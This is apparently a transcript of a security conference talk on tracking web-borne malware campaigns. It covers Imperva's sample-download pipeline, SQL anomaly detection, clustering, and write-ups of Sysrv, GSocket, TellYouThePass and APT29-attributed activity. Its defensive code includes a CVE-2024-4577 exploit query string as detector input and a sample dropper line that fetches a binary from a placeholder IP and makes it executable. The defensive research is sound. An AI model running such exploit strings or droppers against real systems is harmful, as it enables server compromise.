
Real-World Malware Campaign Tracking Using Big Data Analytics And ML Clustering - Daniel Johnston

BSides Prague · 33:07 · Published 2025-04

Hi everyone, and thank you for joining me for my talk today, "Uncovering Malware Targeting Your Web Applications", where I'll be talking about real-world malware campaign tracking using big data analytics and machine learning clustering. I want to give a shout-out to the organizers of the event — it's been great so far and I've really enjoyed it. I know this is the slot after lunch, so I hope there's enough of interest here to keep you awake for the next 30 to 35 minutes.

I want to start by asking a couple of questions. Have you ever wondered how threat actors can leverage your vulnerable web servers to spread malware and achieve their malicious goals through widespread campaigns? Have you ever wondered about the techniques they use, the vulnerabilities they exploit, and the samples they deploy? You might even have wondered how you can detect and expose this activity in your own data sets. Over the past year, Imperva Threat Research, the team I'm a part of, has been working to answer some of these questions, and we're going to share some of the frameworks we've developed and some of the campaigns we've uncovered in this talk.

A bit about me: my name is Daniel Johnston. I'm a security researcher within the threat research group at Imperva, and I've been on the team for about six years. My domains of specialty are web application security, bot detection, and malware analysis with threat intelligence, so if anyone has an interest in those areas I'd be happy to chat — I'll be floating about throughout the day. This research was originally a collaborative effort between myself and a very talented data scientist within the same threat research group. Unfortunately he couldn't be with me today, as he's presenting at Black Hat Asia and is in Singapore at the minute, so I'll have to muddle through this talk without him.

The agenda: in the introduction I'll talk about how threat actors can leverage vulnerable web servers to deploy malicious samples and achieve their goals, and about the data we collect at Imperva — how we collect it, why it matters, and what we do with it. Then I'll describe a framework we've developed for automating malware handling: how we identify malicious samples in a large HTTP data set and how we handle those samples autonomously. After that I'll cover malware campaign identification using anomaly detection and machine learning clustering, and finally I'll talk about some of the campaigns we've been able to identify using the frameworks we've developed.

So let's dive into the introduction. At Imperva, one of our flagship products is the cloud web application firewall. The idea behind the Cloud WAF is to block malicious requests from malicious actors while simultaneously allowing legitimate requests from legitimate users to pass through and reach the origin web server. We see around 3 billion malicious requests every day, which we store as events in our threat research data lake. As you can imagine, that's a vast quantity of data we can leverage for threat intelligence purposes, and it's something we get very excited about because of the possibilities it affords us. Obviously there's a lot of work involved in extracting value from a data set that large, and that's what I'm going to outline over the next 25 to 30 minutes.

I want to take a minute to talk about how threat actors leverage web vulnerabilities for their own malicious purposes and goals. In our work at Imperva we see many different types of threat actor exploiting many different web vulnerabilities in pursuit of different objectives; there are plenty of other vulnerabilities, objectives, and goals, but these are just some examples. A threat actor can use a cross-site scripting vulnerability to steal session cookies or tokens, achieve account takeover, expose sensitive data, and then sell it on some kind of dark market, as we've already seen in previous talks today. But the chain we're most interested in is the use of RCE web vulnerabilities to deploy malware: extortion through ransomware, deployment of crypto miners that use the resources of vulnerable web servers to mine cryptocurrency and make threat actors some money, or botnet deployment to launch further volumetric attacks down the line.

I want to draw attention for a minute to a report released by Verizon Business — it's actually already been mentioned today, I think in the keynote. In that report, the Data Breach Investigations Report, they outline just how important a target web applications are for threat actors in today's landscape: around 40% of the top action vectors in data breaches in 2023 to 2024 can be attributed to web applications, and for non-error and non-misuse breaches, over 20% can be attributed to the exploitation of vulnerabilities in web applications. That gives you an idea of how big a target web applications are for threat actors today.

The report also lists web vulnerabilities that have been instrumental in data breaches over the past couple of years, including vulnerabilities in Atlassian, MOVEit, ManageEngine, and SugarCRM — all of which we're very familiar with in our work at Imperva and have been working to mitigate over the past couple of years.

At this stage I want to show you an example of an RCE exploit attempt that we see in our day-to-day work at Imperva. It's an exploit attempt against CVE-2024-4577, which some of you might recognize as the PHP-CGI vulnerability disclosed in early 2024. This vulnerability allows a threat actor to inject a URL-encoded soft hyphen into the query string of the request, which lets the attacker append additional query string parameters that tell the web server to interpret the POST body of the request as PHP code and execute it on the server. In this case the attacker is invoking PHP's system() — you can hopefully see it on the slide — in order to invoke mshta, which downloads and runs a Microsoft HTML Application, possibly JScript- or VBScript-enabled, allowing the attacker to run further arbitrary code on the infected server. It's a great example, but it has some very clear limitations: we cannot deduce what the threat actor is trying to do, because we don't know what the file being downloaded is, what the sample contains, or what the attacker is ultimately trying to achieve.
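To make that pattern a bit more concrete, here is a minimal detection sketch in Python — not Imperva's actual logic. It simply flags a URL-encoded soft hyphen in a query string, and the extra php-cgi directives it looks for (allow_url_include, auto_prepend_file) come from public write-ups of this CVE rather than from the slide, so treat them as assumptions.

```python
# Minimal sketch: flag request query strings matching the CVE-2024-4577 pattern
# described above (a URL-encoded soft hyphen smuggled into the query string so
# that extra php-cgi directives are parsed). Field names and hints are
# illustrative, not Imperva's detection logic.
from urllib.parse import unquote_to_bytes

SOFT_HYPHEN = b"\xad"  # what %AD decodes to
SUSPICIOUS_HINTS = (b"allow_url_include", b"auto_prepend_file", b"php://input")

def looks_like_cve_2024_4577(raw_query: str) -> bool:
    decoded = unquote_to_bytes(raw_query)
    if SOFT_HYPHEN not in decoded:
        return False
    # The soft hyphen alone is rare in legitimate traffic; extra php-cgi
    # directives in the query string make the verdict much stronger.
    return any(hint in decoded.lower() for hint in SUSPICIOUS_HINTS)

if __name__ == "__main__":
    sample = "%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input"
    print(looks_like_cve_2024_4577(sample))  # True
```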

That leads me on to the limitations of the data we collect at Imperva. We have no access to endpoints — no visibility over endpoints the way some other vendors have — and therefore we only really have visibility over the first four links in the cyber kill chain, something that's also been outlined in earlier talks. We don't have any visibility over the installation of malware on an asset, for example, or over the communication between an infected server and a command-and-control server, so from that alone we cannot deduce the objectives of the attacker. Enrichment is clearly required in order to reveal the intent of malicious actors in our data set.

That brings me to the framework we've developed for automating malware handling. This is a very high-level diagram of it, so let's walk it from left to right. At Imperva we see many different threat actors leveraging many different web vulnerabilities against sites and services onboarded to the Imperva Cloud WAF. We store those malicious requests as events in our threat research data lake, which amounts to billions and billions of events. We apply some fairly sophisticated queries and ETLs to extract the malicious URLs from that large data set, then take those URLs to a sandboxed environment completely isolated from production, where we download, process, and hash them and store them in isolated cloud storage. For each sample we analyze, we create a log containing its metadata, which we then reimport back into the data lake so we can cross-correlate between web application events and the malicious samples the attackers are attempting to deliver. Finally, we enrich that data from threat intelligence sources such as VirusTotal, which gives us a very rich picture of what threat actors are trying to achieve through their exploitation attempts.

A few words about the downloader within this framework. It's completely isolated from our production environment — we don't want to be downloading malicious samples inside production and putting key assets at risk. It's a dockerized Python service that downloads, analyzes, compresses, and stores each sample, and each sample is stored under its SHA-256 hash as the file name, which lets us retrieve it later and perform manual analysis if required.
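To give a feel for what such a service does, here is a minimal sketch of the download-hash-store loop under those assumptions; the paths, metadata fields, and library choices are mine rather than Imperva's, and a real service would add sandboxing, size limits, and error handling.

```python
# Minimal sketch of an isolated sample downloader: fetch a suspected malicious
# URL, name the sample by its SHA-256 hash, compress it, and emit a metadata
# record for reimport into the data lake. Illustrative only.
import gzip
import hashlib
import json
import pathlib
from datetime import datetime, timezone

import requests

STORAGE_DIR = pathlib.Path("samples")  # stand-in for isolated cloud storage

def fetch_and_store(url: str) -> dict:
    resp = requests.get(url, timeout=30, allow_redirects=True)
    content = resp.content

    sha256 = hashlib.sha256(content).hexdigest()
    STORAGE_DIR.mkdir(parents=True, exist_ok=True)
    sample_path = STORAGE_DIR / f"{sha256}.gz"
    with gzip.open(sample_path, "wb") as fh:  # store compressed, named by hash
        fh.write(content)

    # Metadata record that would be reimported into the data lake for
    # cross-correlation with the original web application events.
    return {
        "source_url": url,
        "sha256": sha256,
        "size_bytes": len(content),
        "downloaded_at": datetime.now(timezone.utc).isoformat(),
    }

if __name__ == "__main__":
    record = fetch_and_store("http://example.com/payload.sh")  # placeholder URL
    print(json.dumps(record, indent=2))
```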

Baked into the downloader we have something we call second-stage URL detection. Many of the samples targeting web servers specifically are textual in nature — by that I mean they're often bash or PowerShell scripts that act as second-stage downloaders for second-stage binaries. To extract the URLs from these textual samples, we initially applied a regular expression to parse out each URL and download it, but we soon realized that isn't a great solution, because a URL can be split across several parameters and a regular expression isn't really going to cut it. So what we came up with was LLM-based second-stage URL detection. For any problem in today's world, what do you do? You take it, fire it at an LLM, and hope for the best. We take the content of the textual sample and provide it, along with a prompt, to an LLM such as ChatGPT, and 99% of the time it's very successful at parsing out the second-stage URL, which we can then download and store in our isolated cloud storage environment.
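As a rough illustration of that idea, here is a minimal sketch using the OpenAI Python client; the model name and prompt wording are illustrative assumptions rather than the production setup, and in practice you'd validate whatever the model returns before fetching anything.

```python
# Minimal sketch: ask an LLM to pull second-stage download URLs out of a
# textual first-stage sample (e.g. a bash dropper). Model choice and prompt
# are illustrative assumptions.
import json

from openai import OpenAI

client = OpenAI()  # expects OPENAI_API_KEY in the environment

PROMPT = (
    "The following is a shell or PowerShell script used as a malware dropper. "
    "Return a JSON array of every URL the script would download from, even if "
    "the URL is assembled from several variables. Return only the JSON array.\n\n"
)

def extract_second_stage_urls(sample_text: str) -> list[str]:
    resp = client.chat.completions.create(
        model="gpt-4o-mini",
        messages=[{"role": "user", "content": PROMPT + sample_text}],
    )
    try:
        return json.loads(resp.choices[0].message.content)
    except (ValueError, TypeError):
        return []  # model didn't return clean JSON; fall back to manual review

if __name__ == "__main__":
    dropper = 'H="http://198.51.100.7"; P="/x/bot.bin"; curl -s "$H$P" -o /tmp/x; chmod +x /tmp/x'
    print(extract_second_stage_urls(dropper))
```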

To summarize the system we developed for automating the downloading of malware samples: we have a large volume of HTTP data stored in our threat research data lake; we extract the malicious URLs using ETLs and queries; we download the samples in an isolated environment; we create metadata for each sample and reimport it into the data lake so we can cross-correlate between the web application attacks and the malicious samples; and the final piece is enrichment from threat intelligence sources — places like VirusTotal, sandboxes, and honeypots — giving us a rich volume of data that we can process further and extract value from.

In this part of the talk I want to change gear a bit and talk in more technical terms about some of the frameworks we've developed to extract value from this large data set. I will say that this part was supposed to be given by my colleague, but as he's not able to be with me today, I'll be muddling through without him.

So: the anomaly detection and the machine learning clustering that we apply to this large volume of HTTP data. Let me start with the anomaly detection. Here's an example of an anomaly we identified in the data set: the chart shows an anomaly in the exploitation of a specific CVE by a specific HTTP client. You see a fairly even pattern over time until around the 2nd of October 2024, where there's a massive spike of almost 500%. Essentially, this gives us an opportunity to drill down into the data and understand why the anomaly occurred in the first place — what the threat actor is trying to achieve, who the targets are, and what exactly is going on behind it.

Here's a second example, slightly different from the first: this one tracks domains or URLs injected into malicious HTTP requests over time. Again you see a fairly even pattern until the end of August, where there's a massive increase of over 600%, and again this gives us the opportunity to dive into the data behind it and understand what the threat actor is trying to do, who's being targeted, and so on. These anomalies let us first identify malicious patterns and then understand them more fully.

How do we actually generate these anomalies? We have a completely serverless architecture: a managed SQL engine, which is Trino, and a managed cloud function that does the collection, the aggregation, and the anomaly detection. We have hundreds of counters with which to monitor anomalous activity, resulting in over 20 million anomalies at any given time.

This is the data flow for our anomaly detection system. As I mentioned earlier, our threat research data lake has thousands of tables and terabytes of data. We read the data from the source tables into a dedicated counters table, and we perform this operation only once, because it's a very heavy operation that requires a lot of aggregation, a lot of filtering, and therefore a lot of resources — so we only want to do it one time.

Once the data is in the counters table, we use cloud functions to do further aggregation and identify the anomalies, which I'll explain a bit later. The key point is that everything happens within that dedicated counters table, which means we can query it with our query engine and it's readily available to our analysts.
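To make the counters-table idea concrete, here is a rough sketch of the kind of one-off aggregation that moves raw events into a counters table; the table and column names are hypothetical, since the talk doesn't spell out the schema, and the query is just submitted to Trino from Python to show the shape of the operation.

```python
# Sketch: populate a dedicated counters table from raw attack events, once,
# so that later anomaly detection only ever touches the (much smaller)
# counters table. Schema names are hypothetical.
from trino.dbapi import connect  # official Trino Python client

POPULATE_COUNTERS = """
INSERT INTO research.counters (dataset, counter_key, bucket, hits)
SELECT
    'exploited_cve_by_client'        AS dataset,
    cve_id || '|' || http_client     AS counter_key,
    date_trunc('hour', event_time)   AS bucket,
    count(*)                         AS hits
FROM research.waf_events
WHERE event_time >= current_timestamp - INTERVAL '90' DAY
GROUP BY 1, 2, 3
"""

conn = connect(host="trino.internal", port=8080, user="research",
               catalog="hive", schema="research")
cur = conn.cursor()
cur.execute(POPULATE_COUNTERS)
print(cur.fetchall())  # fetching drains the result and reports the row count
```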

So how does a researcher define a counter within this anomaly detection framework? We have a dedicated JSON configuration file called a data set, which is essentially a list of counters that our researchers can define, where each counter is an SQL statement for getting data. For example, we might want to track a client over time, or an exploited CVE over time, or any combination available in the data we collect at Imperva. We then group by each key to get the hourly, daily, or weekly count for each counter. For instance, we might define a data set for an exploited CVE with counters for exploited CVE plus HTTP client, or exploited CVE plus injected domain or IP — and we have thousands of these counters being tracked at any given time.
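As an illustration of what such a data set might look like, here is a hypothetical configuration expressed as the Python equivalent of the JSON file; the counter names and SQL are invented for the example, not taken from the real configuration.

```python
# Hypothetical "data set" definition: a named list of counters, each backed by
# an SQL statement, grouped by key and time bucket. In practice this would
# live in a JSON configuration file.
DATASET_EXPLOITED_CVE = {
    "name": "exploited_cve",
    "granularity": "hourly",
    "counters": [
        {
            "name": "cve_by_http_client",
            "sql": "SELECT cve_id || '|' || http_client AS counter_key, "
                   "date_trunc('hour', event_time) AS bucket, count(*) AS hits "
                   "FROM research.waf_events GROUP BY 1, 2",
        },
        {
            "name": "cve_by_injected_domain",
            "sql": "SELECT cve_id || '|' || injected_domain AS counter_key, "
                   "date_trunc('hour', event_time) AS bucket, count(*) AS hits "
                   "FROM research.waf_events GROUP BY 1, 2",
        },
    ],
}
```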

So how exactly do we do the anomaly detection? Again, a completely serverless architecture: a managed query engine, managed cloud functions, and no servers. We use SQL and the features baked into the Trino query engine to do it. At this stage I want to appeal to you to take a look at the query engines available in your own environments and infrastructure, because query engines today are very rich, and there are more than likely functions in there that will help you do exactly the same thing for your own use cases.

Let's look at an example of how we do the anomaly detection in SQL — in this case, identifying anomalies based on the distance from the average. The first step is to collect the data for a given data set; it's already sitting in the counters table, so we can query all of the keys and all of the counters for a specified period of time, say 90 days, and hold them in memory. Then we calculate the statistics: the average of the data per counter plus the standard deviation. The last stage is to calculate the anomalies themselves. For this example, an anomaly is any value larger than the average plus two times the standard deviation, which means that for any given counter we can identify suspicious activity where it spiked within the defined period of time. It's important to note that we traverse billions of records and the data never leaves the database — billions of records in just minutes, which is pretty cost-effective and efficient.
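Here is a rough sketch of that distance-from-average rule as a single Trino query, reusing the hypothetical counters schema from the earlier sketch; the threshold and column names are illustrative, not the production query. It would be submitted through the same Trino client shown above.

```python
# Sketch: flag counter values more than two standard deviations above that
# counter's 90-day average, entirely inside the database. Hypothetical schema.
FIND_ANOMALIES = """
WITH stats AS (
    SELECT
        dataset,
        counter_key,
        avg(hits)    AS avg_hits,
        stddev(hits) AS std_hits
    FROM research.counters
    WHERE bucket >= current_timestamp - INTERVAL '90' DAY
    GROUP BY dataset, counter_key
)
SELECT c.dataset, c.counter_key, c.bucket, c.hits
FROM research.counters AS c
JOIN stats AS s
  ON c.dataset = s.dataset AND c.counter_key = s.counter_key
WHERE c.bucket >= current_timestamp - INTERVAL '90' DAY
  AND c.hits > s.avg_hits + 2 * s.std_hits   -- the anomaly rule from the talk
ORDER BY c.hits DESC
"""
```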

I want to move on to malware clustering. Why are we clustering malware injection records in the first place? We see millions of requests every day where attackers are attempting to inject malware using web vulnerabilities, and we can't simply hand millions of records to our analysts and expect them to evaluate and analyze them efficiently — they just wouldn't get anything done, and they wouldn't be able to prioritize. So we need some way of providing a summary of the attacks that can be handled quickly and effectively. You can see here how thousands or tens of thousands of records have been clustered into a single record with the start time, the extracted URL, and the count of attacks, plus many other fields I haven't included on this slide, which we can then hand to our analysts.

How do we do this? Again with the serverless stack we know and love: our managed query engine and managed cloud functions. The query engine lets us group individual records into aggregated attacks, and we can then calculate the distances between those aggregated attacks and generate clusters from them — I'll show a bit more of how that works on the next slide. Both the grouping and the distance calculations are heavy operations, but because we do them in SQL, the data never leaves the database and we don't need additional processes, servers, or services, which keeps it cost-effective. Once the distances are calculated, we save them into an object store and move to the next step, the clustering algorithm, and generally within a few minutes we have our clusters calculated. So in summary: we take the distances, load them into memory, run the clustering algorithm, and put the results back into the object store. Once the results are there, we can again use SQL to group similar clusters into ongoing malware campaigns that we provide to our analysts for review.
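The talk doesn't name the clustering algorithm, so as one plausible sketch of the "load distances into memory and cluster" step, here is DBSCAN over a precomputed distance matrix; the parameters and toy data are illustrative only.

```python
# Sketch of the "load distances into memory and cluster" step. DBSCAN over a
# precomputed pairwise-distance matrix is one common choice for this kind of
# workload; distances and parameters below are illustrative.
import numpy as np
from sklearn.cluster import DBSCAN

def cluster_attacks(distance_matrix: np.ndarray) -> np.ndarray:
    """distance_matrix[i, j] is the pairwise distance between attacks i and j."""
    model = DBSCAN(eps=0.3, min_samples=2, metric="precomputed")
    return model.fit(distance_matrix).labels_  # -1 marks noise / unclustered records

if __name__ == "__main__":
    # Toy 4x4 symmetric distance matrix: attacks 0-1 and 2-3 are close pairs.
    toy = np.array([
        [0.0, 0.1, 0.9, 0.8],
        [0.1, 0.0, 0.9, 0.9],
        [0.9, 0.9, 0.0, 0.1],
        [0.8, 0.9, 0.1, 0.0],
    ])
    print(cluster_attacks(toy))  # e.g. [0 0 1 1]
```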

So how do we do the distance calculations? Again, we use SQL for this, which makes it much more cost-effective than the alternative of pulling the data out into different systems or services and using data frames. Let's look at an example of what we're doing. We take the attack data and calculate the distance between every pair of distinct attacks by doing a self-join, which lets us compare the record on the left side of the join with the record on the right side. We can use many different features to determine the distance between two attacks: in this example we check whether it's the same HTTP client, and we also use several functions of the Trino query engine to calculate distances — for example, Levenshtein distance between two URL paths, and cosine similarity between two histograms of target sites. I should say that during development it took a lot of tuning and fine-tuning of both the queries and the clustering algorithm to get this just right, and of course we have many more features than the ones shown here, but this is broadly how it works.
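Here is a sketch of what that pairwise self-join could look like as a Trino query; levenshtein_distance and cosine_similarity are built-in Trino functions, while the table, columns, and feature weights are invented for the example. The resulting distances would then be written out for the clustering step described above.

```python
# Sketch of the pairwise-distance self-join, reusing the hypothetical schema.
# levenshtein_distance() and cosine_similarity() are built-in Trino functions;
# the table, columns, and weights are illustrative.
PAIRWISE_DISTANCES = """
SELECT
    a.attack_id AS left_id,
    b.attack_id AS right_id,
    -- combine several features into one distance; weights are made up here
      0.4 * IF(a.http_client = b.http_client, 0.0, 1.0)
    + 0.3 * (levenshtein_distance(a.url_path, b.url_path)
             / CAST(greatest(length(a.url_path), length(b.url_path)) AS double))
    + 0.3 * (1.0 - cosine_similarity(a.target_site_histogram, b.target_site_histogram))
      AS distance
FROM research.aggregated_attacks AS a
JOIN research.aggregated_attacks AS b
  ON a.attack_id < b.attack_id   -- self-join over every distinct pair
"""
```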

Now I want to move on and talk about some of the real-world campaigns we've been able to identify using the frameworks we've developed. Obviously I can't go through all of the campaigns we've identified — there are a few here I'm not going to talk about, and I won't be able to go into great detail on any of them — so if you want more detail, they're all published on the Imperva blog at imperva.com.

The first one is the Sysrv botnet. This is a well-known botnet malware written in Go, spread using various well-known web vulnerabilities; what we observed was the exploitation of vulnerabilities in Atlassian Confluence and Apache Struts being used to deploy this campaign and this malware. The goal behind the campaign is to deploy the XMRig cryptominer in order to use the resources of infected web servers to mine cryptocurrency and make the threat actors some money. We were able to use the infrastructure and services we created to identify new TTPs and new IOCs that weren't previously available in the public domain: we aggregated all of the web application events — the requests and the attacks — along with the samples, analyzed them in a very effective and efficient way, and identified the use of a Google Sites domain hosting the second-stage binary of this attack. As you can see in the screenshot on the right-hand side, what looks like a generic Google 404 error page actually contains the encoded bytes of the second-stage binary.

The second campaign I want to talk about is the GSocket PHP botnet, which we observed in the second half of 2024.

It's a hugely widespread malware campaign targeting tens of thousands of PHP web servers. We observed millions of requests containing a payload attempting to install the GSocket reverse shell, a tool that allows attackers to maintain persistence on an infected host even after the original vulnerability or the original backdoor has been patched. A deep dive into the campaign actually revealed a link to the promotion of Indonesian gambling through search engine optimization, probably in response to a government crackdown on online gambling in Indonesia. Again, the full details of this campaign are in our blog, so you'll be able to check that out.

The third campaign I want to talk about is TellYouThePass ransomware, which we observed exploiting the PHP-CGI vulnerability I outlined earlier in the talk. This is a ransomware campaign targeting PHP servers specifically — not something that's typical in today's landscape — and it's deployed via a VBScript-enabled Windows HTML Application containing the obfuscated bytes of a .NET binary. As you can see in the screenshot on the right-hand side, the s parameter contains the encoded bytes of the .NET binary, which we were able to extract, decode, and load into dnSpy to understand what the sample was actually doing. Upon execution, it enumerates the files on the file system, encrypts them, and publishes a ransom note to the web root of the PHP server. It was quite an interesting one to find, because it targeted PHP servers specifically for ransomware deployment.

The final campaign I want to talk about is one we believe we can attribute to APT29. APT29, also known as Cozy Bear, is a threat group associated with the Russian SVR, the foreign intelligence service, and they've been associated with many notorious cyber attacks over the past few years, including the SolarWinds supply chain attack and the mass exploitation of JetBrains TeamCity servers last year.

In March of this year, we observed a very coordinated and very targeted attack against Polish government assets, and a further attack that we observed in November targeting Ukrainian financial institutions. The attack involved the exploitation of an F5 BIG-IP vulnerability — a vulnerability in a well-known load balancer application — in an attempt to deploy the Sliver implant. For those of you who are unfamiliar, Sliver is an open-source alternative to Cobalt Strike developed by Bishop Fox, and it allows a range of post-exploitation activities on an infected host, such as information gathering and further arbitrary command execution.

So how were we able to attribute this activity to APT29? There are three reasons. First, Sliver is a known TTP of APT29 according to MITRE and Cybereason, so if they've used that tool in the past, it makes sense that they'd use it in this campaign as well. Second, the C2 we observed is linked with previous APT29 JetBrains TeamCity campaign activity — if a piece of infrastructure was used in past campaigns attributed to APT29 and we observe it here, that's a good indication it's the same threat actor. And third, only targets of interest to the Russian state were implicated in this particular campaign: Ukrainian financial institutions and Polish government websites give a strong indication that this is a Russian threat actor.

On to the conclusion and takeaways. I think there are three main takeaways from this talk. First, automation, big data analytics, and anomaly detection provide excellent tools for threat hunting at scale, and I hope that through what I've covered in these slides you can take away some ideas to apply to your own data sets.

Second, threat actors such as the ones demonstrated here are regularly leveraging web vulnerabilities for malware deployment; this is something we see day in and day out in our work at Imperva, and it's also backed up by the Data Breach Investigations Report I mentioned earlier. And third, the identification, correlation, and tracking of malware campaigns has real community value. The blogs we publish from this infrastructure have been very well received by the public and by the community in general, because the IOCs and TTPs published in them can be used in other investigations in other organizations.

That's all I have for today's talk. Thank you for listening, and if anyone has any questions, I'll be floating about here, so please feel free to come and chat to me. Thank you.